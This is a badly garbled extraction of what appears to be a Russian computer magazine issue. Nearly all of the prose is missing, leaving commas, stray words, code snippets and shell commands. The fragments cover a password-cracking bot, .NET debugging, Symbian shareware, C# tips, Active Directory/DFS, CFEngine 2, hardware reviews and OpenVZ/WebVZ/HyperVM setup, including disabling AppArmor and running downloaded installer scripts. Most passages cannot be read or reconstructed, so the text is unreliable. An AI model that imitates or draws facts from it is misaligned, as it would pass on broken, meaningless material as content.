    @"HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0", "~MHz", 0);


,
,
() :
int RangeValue = Core * Takt * 9;
//

,

(
) .

:
1. ;
2. ;
3.
.
() .
1-3;
4.
.
, , , .

,
,
. , :

.

.
, .

,
. ,
, ,
abcde39# .
( !zxcv4M
1234567). n- ,


1.
;).
Bot. GetJob(int
<__>).
,
brain GetJob:
brain.GetJob(" ");

, , , .
,

.


:
,
,

.
,
,
-
,
a.k.a John the Ripper.

/pen-/security-
, . ,
,
,
, ? : -
,
( ;)) ,
.
:
,
. , MD5-.
,
! z

stannic.man@gmail.com

.NET


.NET FRAMEWORK

, .NET-
, , ,
.NET Framework
Win32-.
.NET- , ,
PE-.
, PE-
, runtime-
CLR. , .NET
CLR. .NET ,
mscoree.dll

_CoreExeMain. ,

, .NET .
,
.NET
_CoreExeMain .
, .NET- ,
,
.NET-
.
,
, .
.NET
Framework?
-,

. ,
.NET .
CLR ,

.


.
(reflection).
.NET Framework
, ( CLR) .

, -,
,
MSIL-, .

.
Visual Studio ,
.
,
Visual Studio.NET,
IntelliSense.
IntelliSense , ,

. Visual Studio.NET
, .
CLR
, , .

,
.
.
,
, , .
,
,
.
, .
(
)?
?
, .
:
TypeDef ,
MethodDef, PropertyDef
EventDef, ,
.
MethodDef
, . FieldDef,
ParamDef, PropertyDef EventDef, ,
, , , ,
.
, AssemblyRef,
,
, ModuleRef


CorDbg

INFO

.NET, exe-, dll ,


IL. ,
ILDASM
Win32-,
! ,

, MSIL,
www.ecma-international.org,
. ?
,
:).



ILDASM

(call stack)
microsoft.visual.studio.dll!DesignerHost.Add
IL-

DVD

,

.NET
Framework.

HTTP://WWW
blogs.msdn.com/
jmstall

,

geekswithblogs.net/.netonmymind/archive/2006/03/14/72262.aspx
WinDBG+SOS, adplus.
vbs,
\ adplus.vbs www.microsoft.com/whdc/devtools/debugging/default.mspx.


.NET-

PE-, , .
, TypeRef
MemberRef. ,
, ,
.
, .NET, ILDASM ( )
Ctrl+M.
, , .NET-,
,
. , Donut
CLR- .NET . CLR COM-, .NET IMetaDataDispenser
IMetaDataDispenserEx, IMetaDataEmit IMetaDataAssemblyEmit.
.NET-
ILDASM, Microsoft
IL. , Visual
Studio.


, IT :
www.xakep.ru/magazine/xs/066/058/1.asp .NET
: (
!)
www.xakep.ru/magazine/xa/108/118/1.asp
:

Microsoft
, .
: CorDbg , GUI- DbgCLR. ,
DbgCLR Visual
Studio.
CorDbg
, .NET Framework.
CorDbg
IL- dis[assemble] , set.
,
reg.
CorDbg
MSDN.
(, !)
Mdbg, Visual Studio,
CorDbg.
DBGCLR
, Visual Studio,
, .

,
.
, , System.Diagnostics.Debug.
, .NET , Assert(), ,
:
System.Diagnostics.Debug.Assert(, ...)



: System.Diagnostics


DBGCLR Visual Studio


managed unmanaged

ILDASM

StackTrace,
.
GetFrame(0)
StackTrace ,
, GetMethod()
MethodBase,
.
:
StackTrace stack = new StackTrace(0);

for (int i = 0; i < stack.FrameCount; i++)
{
    Console.WriteLine(stack.GetFrame(i).GetMethod().Name);
}

, , .
StackTrace,
, StackTrace
Exception. , .
StackTrace Exception

() .NET FRAMEWORK

(. . )

IL- (executive)


. ,
CLR. CLR ,
throw.
, CLR . ,
catch StackTrace ,
CLR. CLR
, ,
, .
Visual Studio
(managed) .

,
Unmanaged code debugging.


,
, .


, .NET
Framework 2.0

WinDBG.

! z


CODING
root@dtarasov.ru

,
shareware
Symbian.


, , ,
:).
SHAREWARE

Shareware
, (
)

(-, .

:) . .).
,

. ,

( ),
,
,
. 99,99%
( ),

,
,
.
, Shareware, , ,

:
,

;
( );


, ,
;
; .

10
,
. ,
:

;
(
);
( ,

);
;
;
.
, , , Nokia --
.
.
Symbian. ,


SHAREWARE
SYMBIAN

, , .
,
.
,
. ,
.

SYMBIAN?

target-
. .
. Symbian (
50%),
, , ,
. ,

Symbian
,
(/
SMS, , ).

, .
, ,
Symbian , ,

Windows, , Windows Mobile,


. ,
Windows, Linux Mac OS,

Symbian.
:
( ),
.
,
. , , ,
.


,
.
, 30%
. 70% ,
, ,
- .
,
, .
, ,
.

, , .
.
,

.

, ( ) ,
.



.

.
,
.

Symbian-, .

SYMBIAN


,

:

- .
,
Hello World.
- ++,
.

. ,
forum.nokia.com, ,
Developing
Series 60 Applications. A guide for Symbian OS
C++ Developers, Symbian Press.

. , ,

.
,
:).
,
, ++.

Symbian.
Nokia N97,
. ,
S60 , -

,
,

. ,
,
S60, .
.
, IDE, , Carbide.C++
. -
Nokia Microsoft Visual
Studio.NET. ,
SDK
.
-
, , ,
.
Symbian ,
-
, .
Symbian,
,
. ,
Symbian,
/++ ( ),
Qt. Qt
, ,
UI.
Symbian ++.
,
,
.
, ,
, ,
. ,

, ,


sms/mms,
, ,
, , .
,
,

.
,
,
.

,
.

, , , .

Blacklist Mobile.
, Symbian.

. ,
,
.
?
,
. ,
,

.
.
: ,

SMS

.

30 , 10 .

,

.


, Symbian, .
,
Symbian
(, ),
, .


,
.
Openbit,
,
. Openbit License Manager

,

,
premium sms (
100 ),
. .
2500
10% .
,
. , ,

.

95%
,
. .

, , , ?
-
. , ,
,
.


50%
!, .

,
,
. Handango, Symbiangear,
Cellmania, .

, . , ,
-, .

Ovi Store Nokia.

,
Nokia.

.
Symbian-.
-
Softkey.
, ,
-,
,
. , Softkey Nokia:
Nokia
,
.
Nokia
,

. , . :
, ,
,
. ,
. ,
,
.
.

. ,
, . -



, ,

(
pre-loading).
,
, .

,
.
.
Openbit
50000 .


. ,
, .

, .
.


. , ,
,
,
.
,
,
. ,

, , .
,
,
,

.

.
SBSH Software (http://sbsn.net).

, 30% .
-
, . ,
,
. ,
,

.

, , ,
. ,
.
Windows Mobile
,
Windows.
WM, . , , (-,
. .).
.
iPhone Symbian , ,
,
AppStore
( jailbreak
1-3 ),
,
. ,

.

Android
, . , , ,

Symbian. Symbian^4
,
Symbian .
, Java, .
Blackberry ,
, Java. , ,
. Maemo
, , Nokia.
, , . ,
, ,
. Java2ME
.
.
- ,
, .
,
.

,
, .
,
,
. ,
, ,
.
, ,
. . . z


CODING
stannic.man@gmail.com


C#
, .
][,
C#
:).

,
C#,

.

. ,
( ),
. readonly-, .

IS IsSubclassOf()?

C#
readonly ( ):
public readonly int ReadonlyValue = 1;
public const int ConstValue = 1;

?
, readonly
.

, , ,



is IsSubclassOf()? , ,
?
-, is
,
MSIL asclass,
IsSubclassOf()
. is ,
null,
IsSubclassOf() . , is
, ,
IsSubclassOf() .

C#
: as
. ,

.
-
,
NullReferenceException,
as null.
,
as,
NullReferenceException, - .
.

/OPTIMIZE /DEBUG


C#

:
C#?
get/set . ,

.
-, , , - :
set { param1 = value; DoSomeWorkOnChanged(); }

-, , :
set { if (value > 0) param1 = value; }.

-, ,
, , ,
:
get { return ReadFormDB(param1); }
set { WriteToDB(param1, value); }

Win32-


Win32.
C#?
Windows.Forms.IMessageFilter.
m.LParam m.WParam:
Win32-
public class Win32MessageFilter : System.Windows.Forms.IMessageFilter
{
    // IMessageFilter requires PreFilterMessage; returning true swallows the message
    public bool PreFilterMessage(ref Message m)
    {
        // 513 == WM_LBUTTONDOWN
        if (m.Msg == 513)
        {
            MessageBox.Show("Win32 message WM_LBUTTONDOWN");
            return true;
        }
        return false;
    }
}
static Win32MessageFilter filter = new Win32MessageFilter();
static void Main()
{
    Application.AddMessageFilter(filter);
    Application.Run(new Form1());
}

,
.

checked unchecked

C# checked unchecked,
. checked-:

byte a = 1;
byte b = 255;

checked
{
    byte c = (byte)(a + b);
    byte d = Convert.ToByte(a + b);
    Console.WriteLine("{0} {1}", b + 1, c);
}

, (a + b) int byte . Convert.ToByte,


checked, Console.
WriteLine(). , unchecked,
. checked
unchecked / :
checked ( c = ( byte ) ( b + a )).

,
/checked ,
unchecked ,
.



( , ,
(). ,
.NET Framework
.
System.Object Equals, true
.
Object:
Equals
public class Object
{
    public virtual Boolean Equals(Object obj)
    {
        if (this == obj) return true;
        return false;
    }
}

, ? Equals
, .
, Equals Object
,
. , Equals:
Equals
public class Object
{
    public virtual Boolean Equals(Object obj)
    {
        if (obj == null) return false;
        if (this.GetType() != obj.GetType())
            return false;

        return true;
    }
}


Equals() .
.NET , , ,
Object.ReferenceEquals().

C#, /optimize /debug.


,

, JIT- CLR , ngen.exe,


.NET Framework SDK.
IL- .
, CLR
, , , , .


, ,
. ,
,

. () (,
, ;)), ,
.NET- ,
.
.NET
.
, ,
; :
, CLR .
, .
SetMaxThreads GetMinThreads. , ,
SetMaxThreads,
, .
25 ,
.
, , CLR
500 . ,
SetMinThreads,
.
, ,
500 . z

SYN/ACK
grinder grinder@synack.ru
urban.prankster martin@synack.ru






. , ,
.
, ,
.
,
.
ACTIVE DIRECTORY
-.
.
, ,
( ,
), , WiFi,
.
,
. , 1
. ,
.
,
.
- , .
,
.
,
,
, , . :
, ,
.
,


.
,
.
,
.

.

, , ,

.

(. Active
Directory ][ 04.2007 AD ][
11.2008), .
, Active Directory, Active Directory (dcpromo)
, : ,
( ), ,
( ), ,
,
-, .

,

, ,
.
, . , ,
, , ,
, , .
, , , .
-
, ,
.
,

NTFS , , , .
,
, . . ,

RDP
,
( Windows
, ][).

, ( ,
). , ,
,
. , , ,
. ,
(Read-Only Domain Controller,
RODC),
, RODC
.
, .


.

,
. (Distributed File System, DFS). ,
,
, . ,
,

, ,
. , (Remote Differential
Compression RDC), ,
. ,
, ,
.
, DFS Active Directory
Standalone (), ,
, DFS.

,
][ 2007 , DFS
Win2k3. Win2k8/R2 DFS ,
. DFS
.

DFS DFS.

Namespace .
. Active
Directory, .

, (
),
. , ,
. ,
.
.
:
> ServerManagerCmd -install FS-DFS FS-DFS-Namespace \
FS-DFS-Replication

DFS,
. , , .
, DFS
. ,
.
, . ,
,
.
, , . DFS, Win2k8,
,
. , .
, , , , (,


DFS
-, ), .
, ,
,
.
,
, ,
, .

, .

.
:
.doc , ,
. (Enable Access-Based


Active
Directory

Active Directory ,
. , Microsoft .
Microsoft Assessment and Planning Toolkit ,
( , WMI) , ,

(Hyper-V, SQL ). Active Directory ,
.
Active Directory Sizer tool, ( , , Exchange) . , Active Directory Sizer
tool Win2k,
.
ADTest.exe Active
Directory .
, .
Active Directory Migration Tool (ADMT), ,
.
.


Enumeration, ABDE)
. ABDE
.
:
DFS ,
,
. ABDE
. . dfsutil. :
> dfsutil property ABDE \\synack.ru\Namespace1
\\synack.ru\Namespace1: ABDE


:
> dfsutil property acl grant \\srv1\Namespace1\docs "SYNACK\Domain Admins":R Protect Replace

:
Win2k8/Vista,
.
.
DFS . ,
Win2k8 SYSVOL
DFS.
,

.
DFS RODC, DFS
SYSVOL
.
Win2k8R2 ,
DFS
. DFS

, Standalone,
Domain-based DFS.



,


, .
: ,
RDP,
. , , .
,
TS (Terminal Services)
, . Win2k Win2k3
,
Win2k8 ,

TS. RemoteApp,
, -
(TS Web Access) (TS Gateway) ( TS Win2k8
][ 09.2008).
Win2k8R2 Virtual Desktop
Infrastructure (VDI), ( ) ,
.
, R2 Terminal Services

(Remote Desktop Services, RDS),
. .
RDS Win2k8R2,

. ,
, . ,
,
. RDS , , .
VDI Hyper-V,
, ( Hyper-V
, ][ 02.2009).
,

.
, CredSSP ( Vista ),

RDS
.
,
,
DoS-
. .

, - ,
, Aero (,
).
RDS
, .
. ,
(, ,
),
Windows ( / -), ,

( ).
NAP ( ][ 12.2008).
,
,

.
- RDS.
(RD Connection Broker, Win2k8
), ,

( Win2k3 Session
Directory ( )).
,
- (
).

( -

INFO

:

Win2k3
Active
Directory, ][_04_2007.

Win2k8 AD, ][_11_2008.
Hyper-V

,
][_02_2009.
Terminal
Services Win2k8

, ][_09_2008.
NAP
,
][_12_2008.
NLB
Win2k3 ,
][_02_2008.
Failover
Cluster Win2k8
,
][_10_2008.


Windows
- .

.

IIS

HTTP://WWW
Microsoft, Win2k8R2
www.microsoft.com/windowsserver2008/ru/ru.


), , ,
. , ,

.
.
.
. 100,
50,
, . IP-,

IP-, . , , . ,
:

IIS - , ,
,
-
.
, ,
. Win2k8/R2
IIS 7.,
,
-. IIS
, .
40 IIS, 8
, .
XML- ( %systemroot%\
windows\system32\inetsrv\config)
( IIS
Apache), - (
xcopy). .

(Shared Configuration), (AppHost.config), UNC
, -,
-.
,
(
NTFS ). IIS

. ,
, ,
.
,
. ,
. - .
(
, ),
.

IIS, .
DFS
( ) , -.
Network Load Balancing (NLB)
-.
, , , ,
.
, ,
.
. z

SYN/ACK
j1m@synack.ru

CFENGINE 2
,
,
.
dssh rsync ,
. ,
.
CFENGINE (CONFIGURATION ENGINE)
,

. CFEngine
,

. .CFEngine
,
, / , / , , .

,
,

.

CFEngine
, ,
.

,
,
. ,

,

,

CFEngine 2.
, CFEngine
UNIX- Linux-,
. ,
Debian/Ubuntu
:
$ sudo apt-get install cfengine2

CFEngine
:
(cfservd)
(cfagent)
(cfexecd)
cfservd ,
, .
cfagent,
CFEngine-, . ,
( ,
, . .).
cfexecd
-.


/ .

, CFEngine

, . cfrun,

( ).
cfkey
"/ ",
. cfenvd , ,
, ,
..
cfagent

, cfenvgraph

. Cfshow
CFEngine
.

var (/var/lib/cfengine2),
:
CFEngine 2
bin , /usr/
sbin
inputs ,
/etc/cfengine2
modules
ppkeys
state CFEngine


[Diagram: policy server (cfservd) distributing update.conf and cfservd.conf to clients (cfservd, cfexecd); cfrun and cfagent between them]

CFEngine
, . ,
, :
.
.
, .
.
.
, .
.

, ,
,
.
,

. ,
,
.
-,
. ,
apache
, ,
apt-get install apache2,
httpd.conf.

. CFEngine , , . :


cfagent.conf
cfrun.hosts
cfservd.conf


:
class1::
# 'class1'

class2|class3::
# 'class2|class3'

, .
CFEngine 20
, files,
, editfiles
, packages . ,
, , . ,
- . , .
, . ,

. "" , CFEngine -,
,
. - control,
, ,
actionsequence. :
$ sudo vi /tmp/sample.conf
control:
    actionsequence = ( files )

files:
    /etc/shadow owner=root group=shadow mode=0640 action=fixall

,
:
1 files (
).
2 files
/etc/shadow
, (0640, root, shadow).

(, /tmp/sample.
conf) :
$ sudo cfagent -f /tmp/sample.conf

,
files
MD5- ,

( tripwire).


mountall
, fstab
mountinfo

checktimezone

netconfig
resolve /etc/
resolv.conf
unmount

packages //

shellcommands
editfiles
addmounts
directories
links
mailcheck
required

tidy

disable
files
copy
processes
module:name


,
//


. Linux /etc/shadow, root:shadow, , ,
FreeBSD :
/etc/master.passwd root:wheel.
?
().

Linux-, FreeBSD:
$ sudo vi /tmp/sample.conf
control:
    actionsequence = ( files )
files:
    linux::
        /etc/shadow owner=root group=shadow mode=0440 action=fixall
    freebsd::
        /etc/master.passwd owner=root group=wheel mode=0440 action=fixall


, , ,
CFEngine
, ,
.
, , :
$ sudo cfagent -pv

, . CFEngine

libc,
, .
,
(, Hr00 , Hr12
..),
.

CFEngine "" "". , , freebsd|openbsd FreeBSD,


OpenBSD. Hr00.OpenBSD
.
,
. ,
, .

control,
:
$ sudo vi /tmp/sample.conf
control:
    openbsd::
        crondir = ( /var/cron/tabs )
    linux::
        crondir = ( /var/spool/cron )
    solaris::
        crondir = ( /var/spool/cron/crontabs )

CFEngine ,
.
:
$ sudo vi /tmp/sample.conf
control:
    # the action sequence must name the section that is actually used
    actionsequence = ( shellcommands )
classes:
    linux_sys = ( IsDir(/sys) )
shellcommands:
    linux_sys::
        "echo /sys "

- classes linux_sys,
,
/sys .


CFEngine , . cfkey .
/var/lib/cfengine2/
ppkeys: localhost.pub ( ) localhost.priv (
).

- /var/lib/cfengine2/ppkeys/IP-.pub.
/var/lib/cfengine2/ppkeys/root-IP-.pub.

cfkey
IsDir ,
. CFEngine
,
:

HTTP://WWW links
CFEngine2: www.freesource.ru/dokumentaciya/cfengine
CFEngine2 reference: www.cfengine.org/manuals/cf2Reference.html

INFO

info


cron.
control
cfagent.conf

:
Schedule = ( Min30_35 )



classes
IsNewerThan(f1,f2) , f1
f2
FileExists(f) , f
IPRange() IP- IP-
IsDefined()
IsDir(f) f
IsLink(f) f
IsPlain(f) f
Regcmp(re, ) re
Strcmp(s1,s2)

CFEngine,
:
1 CFEngine.
2 ,
CFEngine.
3 .
, ,
"". ,
.
, .
,
CFEngine ,
.
,
.

cfengine2
Ubuntu

:
1 cfagent.conf (
).
2 cfservd.conf , .
3 cfrun.hosts ().
.
:
$ sudo vi /etc/cfengine2/cfagent.conf
#
control:
#
actionsequence = ( resolve files tidy processes )
#
domain = ( xakep.ru )
# ()
timezone = ( MSK )
# SMTP- e-mail ( )
smtpserver = ( smtp.xakep.ru )
sysadm = ( admin@xakep.ru )
# resolv.conf
resolve:
192.168.1.1
192.168.1.2
#
files:
/etc/sudoers mode=440 owner=root group=root action=fixall
/etc/passwd mode=644 owner=root group=root action=fixall
/etc/shadow mode=640 owner=root group=shadow action=fixall
#
tidy:
/tmp pattern=* age=7 recurse=inf
/home pattern=*~ age=7 recurse=inf
#
processes:
# inetd
"inetd" signal=hup

web-

Web- CFEngine
CFEngine,
,

.
cfservd.conf
:
$ sudo vi /etc/cfengine2/cfservd.conf
control:
domain = ( xakep.ru )
#
TrustKeysFrom = ( 192.168.1.0/24 )
any::
#
MaxConnections = ( 50 )
grant:
# , xakep.ru
/var/lib/cfengine2/inputs *.xakep.ru

TrustKeysFrom is trust on first use: any host in 192.168.1.0/24 that connects before its key is known gets that key stored under /var/lib/cfengine2/ppkeys, so keep the range narrow and remove the setting once every client's key is in place (AllowConnectionsFrom then still limits who may connect at all). trustkey=true on the client side of the update.conf copy accepts the server's key the same way.
, :
. , cfrun.hosts
:
$ sudo vi /etc/cfengine2/cfrun.hosts
domain = xakep.ru
#
srv1.xakep.ru
srv2.xakep.ru

, CFEngine:
$ sudo /etc/init.d/cfengine2 restart

update.conf.

,

cfagent.conf. :

$ sudo vi /etc/cfengine2/cfservd.conf
control:
domain = ( xakep.ru )
#
AllowConnectionsFrom = ( 192.168.1.0/24 )
TrustKeysFrom = ( 192.168.1.0/24 )
# cfagent
cfrunCommand = ( "/usr/sbin/cfagent" )
MaxConnections = ( 50 )
grant:
/usr/sbin/cfagent *.xakep.ru

$ sudo vi /etc/cfengine2/update.conf
control:
actionsequence = ( copy )
domain = ( xakep.ru )
# cfengine
policyhost = ( cfserver.xakep.ru )
# ,
master_cfinput = ( /var/lib/cfengine2/inputs )
#
repository = ( /var/lib/cfengine2/outputs )

# cfagent.conf
# /etc/cfengine2
copy:
$(master_cfinput)/cfagent.conf
dest=/etc/cfengine2/cfagent.conf
mode=600
server=$(policyhost)
force=true
trustkey=true

CFEngine : , CFEngine .

,
CFEngine, ,
,
.
:

$ sudo /etc/init.d/cfengine2 restart

$ sudo crontab -e
0,30 * * * * /var/cfengine/bin/cfexecd -F

cron cfexecd,
CFEngine,

cfagent.conf
.
cfagent.conf ,
.

CFEngine ,
.
CFEngine ,
.
WWW
, , CFEngine. z


SYN/ACK
Nathan Binkert nat@synack.ru


PLANET VIP-882:
VoIP-


IP- PLANET
VIP-88x

> :
T.30, T.38

> :
1 WAN 10/100 Mbps RJ-45
1 LAN 10/100 Mbps RJ-45
8 RJ-11 (6xFXS, 2xFXO)

> :
Voice activity detection (VAD)
Comfort noise generation (CNG)
G.165/G.168 Echo cancellation
Dynamic Jitter Buffer

> :
H.323 v2/v3/v4 SIP (RFC 3261), SDP (RFC
2327), Symmetric RTP, STUN (RFC3489),
ENUM (RFC 2916), RTP Payload for DTMF
Digits (RFC2833), Outbound Proxy Support

> :
TCP/IP, UDP/RTP/RTCP, HTTP, ICMP, ARP,
NAT, DHCP, PPPoE, DNS

> :
G.711 (A-law / u-law), G.729 AB, G.723 (6,3
Kbps / 5,3 Kbps)

> :

QoS
IP TOS (IP Precedence) / DiffServ
NAT

PLANET VIP-882 VoIP-,


, .
6 FXS (
) 2 FXO (
).
IP- H.323v4 SIP 2.0,
G.711 (A-law
/ u-law), G.729 AB, G.723 (6,3 / / 5,3 /),
(-), H.323 Gatekeeper
SIP - (
8-
). , (VAD),

DTMF, G.165/G.168, (silence detection),


,

() .
Web-
( , , , ,
).

, Ethereal.
FXS- FXO,


> :
IP, PPPoE, DHCP
> :
WEB, RS-232 , Telnet
> :
12

> ( x x ):
300 x 160 x 40

.
PLANET VIP-882 NAT,

.
VoIP- (QoS)
-. VoIP-
DHCP-, SNTP-, DynDNS-,
Syslog- ( Web, FTP
), , VIP882,
.
IP- 15300 .


HP ProLiant ML110 G6:
,


HP ProLiant ML110 G6
> ( ):
Intel Xeon X3430 (2.40 , 95 TDP, 8
, 1333 , Turbo 1/1/2/3)
Intel Xeon X3440 (2.53 , 95 TDP, 8
, 1333 , HT, Turbo 1/1/2/3)
Intel Xeon X3450 (2.66 , 95 TDP, 8
, 1333 , HT, Turbo 1/1/4/4)
Intel Xeon X3460 (2.80 , 95 TDP, 8
, 1333 , HT, Turbo 1/1/4/5)
> :
8 DDR3 PC3-10600E 1333 ,
4


> :
SATA- (4
)
SAS 3.5" 1,8
SATA 3.5" 3

> :
PCI-e Gen 1, x1 (x4 connector),

PCI 32-/33 3,3


PCI-e Gen 1, x4 (x8 connector)
PCI-e Gen 2, x16 (x16 connector)
> -:
1
2 PS/2
8 USB 2.0 (2 , 4 , 2 )
> :
(
1600x1200 16 bpp @ 75 , 64 )
DVD-ROM
TPM 1.2
> :
HP ProLiant
100 G6 Lights Out 100i
HP ProLiant ML110 G6 Easy Set-up CD

> :

NC107i

> :
1
1

> :
300

> :
Micro ATX (4U)

HP
, .

,
,
, , HP ProLiant ML110 G6
.
Intel Xeon
X3400 ( , ), Intel Turbo Boost,


, DDR3,
1333 . SATA-

SAS/SATA, 1,8
3 .
PCI
Express ( ) PCI. USB-,
.

HP Tower to Rack
Conversion Tray.

HP, ML110 G6 Lights-Out 100i,
, , ,
, KVM, , telnet,
,


SMASH-CLP, DCMI 1.0, IPMI


2.0.

Easy Set-up CD.
TPM (Trusted
Platform Module) ( ).
Windows BitLocker, Windows Server 2008, TPM


, .
Microsoft Windows, Red Hat Enterprise Linux
SUSE Linux Enterprise Server.

16500 .


SYN/ACK
grinder grinder@synack.ru


, , , . , ,
. ,
.
OPENVZ
: ,
,
.

OpenVZ (OpenVZ.
org) Linux, (Virtual
Environments, VE). ,
VE ( , ,

).
OpenVZ :

Linux.
( 4096
64 ),
,
1-3%.
,
, (venet)
IP . OpenVZ
:

,
,
.
OpenVZ Ubuntu/
Debian. 64-,


64- .
32- (, 4 )
. Ubuntu

LVM,

(Zero Downtime
Backup)
.
SELinux AppArmor. :
$ dmesg | grep SELinux
SELinux: Disabled at boot.
$ dmesg | grep -i AppArmor
AppArmor: AppArmor initialized
AppArmor: AppArmor Filesystem Enabled

AppArmor :
$ sudo /etc/init.d/apparmor stop
$ sudo update-rc.d -f apparmor remove
$ sudo apt-get remove apparmor apparmor-utils

SELinux . , selinux=0 menu.lst (kernel ... selinux=0), /etc/sysconfig/selinux SELINUX=disabled. :
$ sudo setenforce 0

Ubuntu , , OpenVZ,
. ,
OpenVZ
.
OpenVZ RPM RHEL
Ubuntu 8.04 LTS.
, /etc/apt/sources.list :
deb http://download.openvz.org/ubuntu hardy experimental

,
:
$ sudo apt-get update
$ sudo apt-cache search openvz

:
$ sudo apt-get install linux-openvz vzctl vzquota


, /etc/
sysctl.conf:

$ sudo nano /etc/sysctl.conf


# , ARP
net.ipv4.conf.default.forwarding=1
net.ipv4.conf.default.proxy_arp=1
net.ipv4.ip_forward=1
net.ipv4.conf.all.rp_filter=1
net.ipv4.conf.default.send_redirects=1
net.ipv4.conf.all.send_redirects=0
# SysRq ( SysRq X_03_2008)
kernel.sysrq=1

:
$ sudo sysctl -p

VM IP-,
, OpenVZ NEIGHBOUR_DEVS all:
$ sudo nano /etc/vz/vz.conf
NEIGHBOUR_DEVS=all

( ):
$ grep openvz /boot/grub/menu.lst

, : OpenVZ /vz. , :
$ sudo ln -s /var/lib/vz /vz

/vz/template/cache , ( wiki.openvz.org/Download/template/precreated). Ubuntu:
$ wget -c http://download.openvz.org/template/precreated/contrib/ubuntu-8.04.2-i386-minimal.tar.gz
$ sudo cp -v ubuntu-8.04.2-i386-minimal.tar.gz /vz/template/cache

. , . VM , . OpenVZ, modernadmin.com/downloads/?d=ostemplates/xen.

WEBVZ
WebVZ (webvz.sf.net) OpenVZ, Ruby. - (Webrick), SQLite. WebVZ :
OpenVZ (, , , );
Host Node;
OpenVZ, IP-;
- , , ;
OpenVZ;
VM;
;
.
, , . WebVZ . 8887 8888 , firewall.
Ruby SQLite. Rails (rubyonrails.org) , . , 2.0.2, WebVZ Rails 2.3.2 ( 2.3.5, 2.3.2). Ubuntu Ubuntu on Rails Team (launchpad.net/~ubuntu-on-rails), Ruby. , source.list:

deb http://ppa.launchpad.net/ubuntu-on-rails/ppa/ubuntu hardy main
deb-src http://ppa.launchpad.net/ubuntu-on-rails/ppa/ubuntu hardy main

$ sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys B6C6326781C0BE11

, APT :
$ sudo apt-get install ruby rubygems libsqlite3-ruby sqlite3 irb libopenssl-ruby libreadline-ruby rdoc

, rubygems, , :
$ sudo gem update --system

gem install , rubygems :


HyperV_Mon

INFO
OpenVZ

info

OpenVZ

. OpenVZ

(
Linux-),
OpenVZ
:


.

Authorization Manager
(AzMan.msc)

VM
Hyper-V.

$ wget -c http://rubyforge.org/frs/download.php/60718/rubygems-1.3.5.tgz
$ tar xzvf rubygems-1.3.5.tgz
$ cd rubygems-1.3.5
$ sudo ruby setup.rb
$ sudo ln -s /usr/bin/gem1.8 /usr/bin/gem

Rails. , WebVZ 2.3.2, :


$ sudo gem install -v=2.3.2 rails

-v=2.3.2,
, WebVZ
,
RAILS_GEM_VERSION config/environment.rb.
:
$ rails -v
Rails 2.3.5

WebVZ .
WebVZ.
, Git.
:
$ sudo apt-get install git-core

WebVZ:
$ git clone git://github.com/shuaibzahda/webvz.git

DVD
dvd


,


OpenVZ + WebVZ
Ubuntu Linux.


webvz , /var. ,
:
$ cd webvz/
$ sudo ruby script/server
=> Booting WEBrick
=> Rails 2.3.5 application starting on http://0.0.0.0:3000
=> Call with -d to detach
=> Ctrl-C to shutdown server
[2010-01-29 14:08:01] INFO WEBrick 1.3.1
[2010-01-29 14:08:01] INFO ruby 1.8.6 (2007-09-24) [i486-linux]
[2010-01-29 14:08:01] INFO WEBrick::HTTPServer#start: pid=6365 port=3000

, ,
, WebVZ
. ,
, '-d':
$ sudo ruby script/server -d
=> Booting WEBrick
=> Rails 2.3.5 application starting on http://0.0.0.0:3000

/etc/init.d/webvz:
#!/bin/sh
# -d belongs to script/server (detach), not to ruby, where it would mean debug mode
cd /usr/local/webvz/ && /usr/bin/ruby script/server -d
exit 0

: http://192.168.1.200:3000/. , admin admin123. WebVZ Containers, OS-Templates, Configuration files, OpenVZ ( ) Users.
Containers Personalize ( ). 3-4 .
Users, , , . admin, Change Password.
WEBrick here listens on every interface (0.0.0.0:3000) over plain HTTP and the panel runs as root, so restrict port 3000 to the admin network or put it behind a TLS reverse proxy before the password change, not after.

Vtonf

Vtonf (http://sourceforge.net/projects/vtonf)
-

OpenVZ.
. Vtonf RedHat, Fedora
CentOS.

Live Migration

WebVZ
,
(Administration) (Client).
OS-Templates OpenVZ. ,
, ,
,
OpenVZ.
, Containers
New Container ,
,
, , ID, , IP-, , DNS-
root. Create
.
- . , , , ,
.
OS-Templates Re-Create Template,
.

HYPERVM
HyperVM (lxcenter.org)
,
(VPS/VDS). ,
-, .
, HyperVM

Proxmox Virtual
Environment

Proxmox VE (http://pve.proxmox.com/wiki/Main_
Page) Linux

OpenVZ KVM.

web-
,

.
1.5
GPLv2
ISO- 327

DVD-.

,
. ,
, ,
. ,
?
. Live Migration.
Hyper-V, XenEnterprise, VMware ( VMotion). (
60300 ), , VM
, TCP- .
: VM , ,
. VM, , .
, , .
VM ,
, .

,
- .
OpenVZ Xen.
, .

(Resource Plan),
: VPS,
, , .
Xen, OpenVZ,
,
,
OpenVZ Only Xen Only.

HyperVM ,
SSH, ,

, .

, Ajax.
IP-, , .
HyperVM ,
- Vaserv (
2009) LxLabs AGPL-3.0,
SVN .
, RHEL-based
( CentOS).
, : This Operating
System is Currently Not supported.

( virtualization-type xen/openvz/NONE):

HTTP://WWW links
OpenVZ: openvz.org
OpenVZ precreated templates: wiki.openvz.org/Download/template/precreated
WebVZ: webvz.sf.net
HyperVM: lxcenter.org
HyperVM demo: http://demo.hypervm.com:8888
SCVMM 2008: microsoft.com/systemcenter/virtualmachinemanager
PowerShell management Library for Hyper-V: pshyperv.codeplex.com
HVRemote: code.msdn.microsoft.com/HVRemote



WebVZ
$ wget -c http://download.lxcenter.org/download/hypervm/production/hypervm-install-master.sh
$ sudo sh ./hypervm-install-master.sh --virtualization-type=openvz

. , hypervm-install-master.
sh ,
hypervm-install-slave.sh.

HYPER-V
Microsoft Hyper-V,
Windows 2008 , Microsoft Hyper-V Server 2008
(, , ). Hyper-V

(X_02_2009),

,
,
.

Hyper-V
, Hyper-V Tools,
Hyper-V , Hyper-V
(Hyper-V Manager). ,
Win2k8 , Hyper-V.
, ,
,
(Server Core). Vista Hyper-V
(support.microsoft.com/kb/952627 support.microsoft.com/kb/970203). Win7
, Remote Server
Administration Tools for Windows 7 (RSAT),
, , Hyper-V, Active Directory,
DHCP, DNS, , RDP, BitLocker, GPO, Network Load Balancing ..
RSAT for Win7 ,
.


Windows Firewall:


HyperVM

> netsh advfirewall firewall set rule group="Windows Management Instrumentation (WMI)" new enable=yes


DCOM
DCOMcnfg.exe.


-
. , Hyper-V,
HVRemote (Hyper-V Remote
Management Configuration Utility, code.msdn.
microsoft.com/HVRemote).
,
, WF .
, , :
> cscript hvremote.wsf /add:synack\user

:
